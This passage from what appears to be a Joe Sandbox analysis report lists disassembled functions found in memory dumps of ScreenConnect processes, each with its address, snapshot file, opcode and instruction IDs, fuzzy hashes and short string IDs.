                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27953f31bbfb98c73a9c318331abcff17cb7c2204bd4b702beda3adf11092af9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E0DF31700320579B181A9E748822FBEEAFFC8675350803DE60AC3344CFB18C1683E4
                                                                                                                                                                                                                                          Function 01171818 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ef910e5a14ffaa532d10cb3a29b63a34f6c4801260c73a4413ccc1c87c0ef9e3
                                                                                                                                                                                                                                          • Instruction ID: a23f001ae8679e7b456f619724342f8a55fdefa519877e0b7a79e01a75e711f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef910e5a14ffaa532d10cb3a29b63a34f6c4801260c73a4413ccc1c87c0ef9e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E06D31605291DFC72A5F78A4291A97FB1EB4622130940BAE457C7299DF398852DB81
                                                                                                                                                                                                                                          Function 01170838 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e4bb52fe42607ed7e02fc4568e891f53577944380ae47bc60e10ab3aff3bc190
                                                                                                                                                                                                                                          • Instruction ID: 39ecbf962c10165df778a72738cca04cc88af4633d1eeff446a6ca873abd8e30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4bb52fe42607ed7e02fc4568e891f53577944380ae47bc60e10ab3aff3bc190
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEE0ED30905345AFCB59EF649801468BBF0FB56200B2041EADC04C320AE7310F00DB81
                                                                                                                                                                                                                                          Function 011713D0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8aab167895b3937189653dba028ccdc279a4b123597667b0cbab28b0d6c8dc96
                                                                                                                                                                                                                                          • Instruction ID: 59cfbd159f1fef902ef24119df400b25ffabbb0751163e4a07211e5d729161d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8aab167895b3937189653dba028ccdc279a4b123597667b0cbab28b0d6c8dc96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E092311083914FC3169668F840B9D7FE5EF86324F040AA9E0518B15AC768694987A5
                                                                                                                                                                                                                                          Function 01171DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2cec9f00661a9658440415429cbed927bc27f53ddc166d969d3f22d89bda6ead
                                                                                                                                                                                                                                          • Instruction ID: ef3dea5c1d227eac39cac4af8379f715e26979f66d3a4d21bec0fe6b28a77d21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cec9f00661a9658440415429cbed927bc27f53ddc166d969d3f22d89bda6ead
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE086357002246B82286A7DA4085AE7BDAEFD92713104137EE26C3388CF308CA187D4
                                                                                                                                                                                                                                          Function 01171DF8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 989894d25670a30f13ca6626e69128fda8ceb3431ee57dd876679451923fc8ee
                                                                                                                                                                                                                                          • Instruction ID: 9d89a5e1649bb4dc7d2ad1780dbaafb93cfee2f92c8598a59ffb35f3ce2c2eb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 989894d25670a30f13ca6626e69128fda8ceb3431ee57dd876679451923fc8ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE09230509348DFC704DFB8E95158DBBB8EB4A304B1041E9C444E7116E6305E14DB55
                                                                                                                                                                                                                                          Function 01177FB8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 379adff24002bff5547e91a7e05cb15bc0966d02a37aacfd38f422ef8354c7ad
                                                                                                                                                                                                                                          • Instruction ID: 112d1feb5187b9dffc19b24873378ff7b6937f5c6284e8134b02a0d1710b636a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 379adff24002bff5547e91a7e05cb15bc0966d02a37aacfd38f422ef8354c7ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE04F344493909FC341EF34E9456857FF0AF09600F4588ADE8C8C7291F275A94ADB96
                                                                                                                                                                                                                                          Function 01178120 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e060136c915b5c1dc21544aa2e064e599d44e6cb8d3939a08cab45c9c0944a6a
                                                                                                                                                                                                                                          • Instruction ID: bf97033fac00417b68251d0d495a59937f7353267dd8d020bd535d3ad56d4e03
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e060136c915b5c1dc21544aa2e064e599d44e6cb8d3939a08cab45c9c0944a6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E04F70508295DFC345EF78E994485BFF0AF0A200F4489ADD8C8C7201E230A956C752
                                                                                                                                                                                                                                          Function 01171313 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d79f773b456a6c18df04ccc15320601e2e4b12066a3e8491dad1d04233aca699
                                                                                                                                                                                                                                          • Instruction ID: 015f20b4b16eaabe1a63bbdeebe6c5850db45ea78ece42703384aefdb7afb6c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d79f773b456a6c18df04ccc15320601e2e4b12066a3e8491dad1d04233aca699
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE01A70D102059FCB90DFBC84011ADBFF0EF4A260B5483AAC82AEB291E3368502CB40
                                                                                                                                                                                                                                          Function 01170848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e64910717f0dc2e8f07648ddf3fa0352899e90868d2874f852b536e001ad5f7f
                                                                                                                                                                                                                                          • Instruction ID: fd4191fe5d9f01d5b256df37a071aee044447048998238808fdda1560760aad8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e64910717f0dc2e8f07648ddf3fa0352899e90868d2874f852b536e001ad5f7f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D01230901108FF8B48EFA4E90055DBBF9EB45214B1041A9D808D3244DB315F109780
                                                                                                                                                                                                                                          Function 01171E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: adb2f050ed0d5e9c3cd6c4168383258b297baa4b457c4c358f23346780294f3e
                                                                                                                                                                                                                                          • Instruction ID: 4b80f22d10dbbb6e0b9e4ed338fb140ac437b9905459df33154742d1365c46a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb2f050ed0d5e9c3cd6c4168383258b297baa4b457c4c358f23346780294f3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D01271911208EF8B04DFB4E90069DB7B9EB49214B1045A8D809D3208DA319F04DB84

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 044D144F Relevance: 6.6, Strings: 5, Instructions: 319COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                                                                          • API String ID: 0-4248691736
                                                                                                                                                                                                                                          • Opcode ID: aae83231dcb7761b1fc5a1594a4b6baf47856e1c4e78cab7857a9e4357c64370
                                                                                                                                                                                                                                          • Instruction ID: dc78467a1f6a4853c97f05295fd6dea82bd6b4f8c1f487eae8662ef0699bc0dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aae83231dcb7761b1fc5a1594a4b6baf47856e1c4e78cab7857a9e4357c64370
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFC1C2706013424FDB05DF78E9905CDBBB5FF99204B00856EC0859F666EB79E90ECB90
                                                                                                                                                                                                                                          Function 044D14F8 Relevance: 6.5, Strings: 5, Instructions: 220COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                                                                          • API String ID: 0-4248691736
                                                                                                                                                                                                                                          • Opcode ID: 6ca84c7a5419ac6144cee51d206d77d3ec837ba92657a0af65cb1dc29b14d0d9
                                                                                                                                                                                                                                          • Instruction ID: bdabb9e0d73a360d6744543ce0466b8917de311911ecde41316beb6875bdcad3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca84c7a5419ac6144cee51d206d77d3ec837ba92657a0af65cb1dc29b14d0d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC9144706002069FDB19DF79D590A9DBBF5FF98204B00892DD0499F769DB75E908CB90
                                                                                                                                                                                                                                          Function 01F4C6A7 Relevance: 2.8, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          • Opcode ID: 6f03c20978f9e4c1e88b57511162ed1e97f85b535e1afe55baeb6bf0647764c0
                                                                                                                                                                                                                                          • Instruction ID: 3a01a34090ca920b8dc5513f9b43b6edd6da9be42acd6f7c04128f1b2a1c4bf6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f03c20978f9e4c1e88b57511162ed1e97f85b535e1afe55baeb6bf0647764c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C1B130E01349CFDB05EFB8C4A4A9DBFB2FF85304F11856AD445AB265DB359986CB80
                                                                                                                                                                                                                                          Function 044D3540 Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ;$$c"
                                                                                                                                                                                                                                          • API String ID: 0-3747028598
                                                                                                                                                                                                                                          • Opcode ID: f5f6abb632a1bcbbb53e0448b84bfcc876eee6c8de88c8317b76600c6af91d00
                                                                                                                                                                                                                                          • Instruction ID: 9b272c96ef47dd7ced33f563889253dd55a8fe6e95864a5269183543ac61fec8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5f6abb632a1bcbbb53e0448b84bfcc876eee6c8de88c8317b76600c6af91d00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B19C71A012059FDB15DF69D89099EFBF6EFC4204B15C96AD40AAB324EB35EC06CB81
                                                                                                                                                                                                                                          Function 044D3550 Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ;$$c"
                                                                                                                                                                                                                                          • API String ID: 0-3747028598
                                                                                                                                                                                                                                          • Opcode ID: 2a25d3c60a642a7ad3c75fb408dde5376a3dcd74a8fda181dbddb290a764ce5e
                                                                                                                                                                                                                                          • Instruction ID: fa13e32fe3719f26269e718a2218c5a0b7f1339210ad4befa2d13ecdd78d7a8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a25d3c60a642a7ad3c75fb408dde5376a3dcd74a8fda181dbddb290a764ce5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBA16971A002059FDB15EF69D89095EFBF6EF84704B15C96AD40AAB324EF35EC06CB81
                                                                                                                                                                                                                                          Function 01F4EF98 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (&]q$(aq
                                                                                                                                                                                                                                          • API String ID: 0-1602648543
                                                                                                                                                                                                                                          • Opcode ID: 47b54bef3a25093c91a38b77dce10c60cc1b5a0fa1295891bdc46df28204b98d
                                                                                                                                                                                                                                          • Instruction ID: 4eeaeda92e69d12828431beb575fed7cffce6ad331fbf05748343f68acd559c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b54bef3a25093c91a38b77dce10c60cc1b5a0fa1295891bdc46df28204b98d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5614131F002198BEB55EFADC4506EEBAB2AFD9700F148529D506BB384DF35AD42C791
                                                                                                                                                                                                                                          Function 01F45E00 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: H$nCuq
                                                                                                                                                                                                                                          • API String ID: 0-3135758294
                                                                                                                                                                                                                                          • Opcode ID: 813d53830868e5464338fa9317030471932c074ba705b637d726144d4d4b6af6
                                                                                                                                                                                                                                          • Instruction ID: d9226b97496089096e19242901f8e34abade87b821e2827f3100b3e86b201c07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 813d53830868e5464338fa9317030471932c074ba705b637d726144d4d4b6af6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB519070B002028FDB15EB39D854A6EBBE2EFC8250B148469D406DB365EF76DC06CB91
                                                                                                                                                                                                                                          Function 01F45076 Relevance: 2.6, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `Q]q$`Q]q
                                                                                                                                                                                                                                          • API String ID: 0-3952371890
                                                                                                                                                                                                                                          • Opcode ID: ceb17cf4e9e6937dc302bce46e8034590d5c987085f30c181abc941d4a194b02
                                                                                                                                                                                                                                          • Instruction ID: 9cb12d6291897119ba2dd92eb8819e5a11887516d0a75912d85742c46eb753d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb17cf4e9e6937dc302bce46e8034590d5c987085f30c181abc941d4a194b02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D241AF70E00319DFEB609F68C8487AEBBB5FB85300F1084EAD548A7291DB354A45CF92
                                                                                                                                                                                                                                          Function 01F45418 Relevance: 2.5, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          • Opcode ID: 3a84a2c39c285180d22110cca5c553da1847f6ba7f9600064f624f5d6b2d4bf6
                                                                                                                                                                                                                                          • Instruction ID: 68898d810a8e610f537a5f4362b0e60a0be19d70ba529ba83ac4174c94f2de81
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a84a2c39c285180d22110cca5c553da1847f6ba7f9600064f624f5d6b2d4bf6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65D05E30B80208CFD728EE6DE5509113BE9BF46E0232104A5D9058F236CA22EC81CB56
                                                                                                                                                                                                                                          Function 01F4FB60 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: c8d894c0407256c4ba133c38d3c819e4b4f2b506aa0d63cbc3155b26c404b064
                                                                                                                                                                                                                                          • Instruction ID: 9d6cf633be3ed53f3f56e7409fbf50f3e2bdf852596ce45dcbaa4dce2fffa6d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d894c0407256c4ba133c38d3c819e4b4f2b506aa0d63cbc3155b26c404b064
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4D16D74A00709CFCB04DF68D894A99BBB6FF89310B118659E909AB365DB31FC85CF90
                                                                                                                                                                                                                                          Function 01F48DB8 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: e85f2868e77b7ffe40c0bd40e1abf8b133b9d1da6f93d88e5087a27aa704a422
                                                                                                                                                                                                                                          • Instruction ID: 09f7caf4c36a524e247b066d19d580ba1a1f68241b23b6c4807a4dc99fa7c922
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85f2868e77b7ffe40c0bd40e1abf8b133b9d1da6f93d88e5087a27aa704a422
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C361F534B10605CFDB14DFA9D8949AABBB6FF8D354B1081A9E506AB365DB31EC02CB40
                                                                                                                                                                                                                                          Function 01F4AAC0 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 3519ca7bf6872d73fc29cf6b475fc189ddffec49ecd33262e03f8fc188e24801
                                                                                                                                                                                                                                          • Instruction ID: f67625393da4b4568387a0707e3077d2c4307b045dd8a359c92963b8b0df38a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3519ca7bf6872d73fc29cf6b475fc189ddffec49ecd33262e03f8fc188e24801
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51E070B502119FD7258F68D85876EBBF2BF84704F18892AE4479B291DB31DC85CB81
                                                                                                                                                                                                                                          Function 044D043F Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: e9ecf9877b4cbb8cf73b9750dcf6fac1641c10fe1ed5d504233becb5cf4211cd
                                                                                                                                                                                                                                          • Instruction ID: e82bd21251db2d185fe56cfd05bfef13424efa22b1436a6925a15a2d3f4cde5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9ecf9877b4cbb8cf73b9750dcf6fac1641c10fe1ed5d504233becb5cf4211cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D51C1B1B041168FDF14CF59C960A6EBBB2FBC5309F24846BD405DB3A2D634E942CB91
